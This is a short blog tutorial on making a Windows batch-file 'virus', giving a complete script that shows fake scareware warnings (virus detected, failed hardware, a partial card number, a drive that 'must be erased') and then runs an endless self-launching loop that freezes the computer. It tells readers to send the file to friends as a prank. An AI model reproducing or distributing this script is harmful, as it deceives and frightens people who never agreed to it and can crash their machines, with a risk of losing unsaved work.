How to create a simple virus for windows(.bat)?
- yuddha

- Feb 2, 2019
- 1 min read
Updated: Feb 5, 2021
This is the simple virus that can freeze your pc until you forcely shutdown it.
1. Press win+R and type 'notepad'
2. Paste the code
"@echo off
echo WARNING VIRUS HAS BEEN DETECTED
echo System check
echo -
echo Power - FAILED
echo -
echo RAM - FAILED
echo -
echo Norton - FAILED
echo -
echo Breach of IP adress
echo -
echo Firewall - FAILED
echo -
echo Virus attaining: ****-****-****-8894
echo -
echo Hard drive must be erased and rebooted to resume windows.
echo -
PAUSE
echo -
echo Starting to reboot hardrive.
echo -
echo Do not attempt to quit.
echo -
echo Restart after 10 minutes approximately.
PAUSE
:START
start InternetExplorer.bat
GOTO START"
3. Save it as internetExplorer.bat
(send it to your friends for prank)




Comments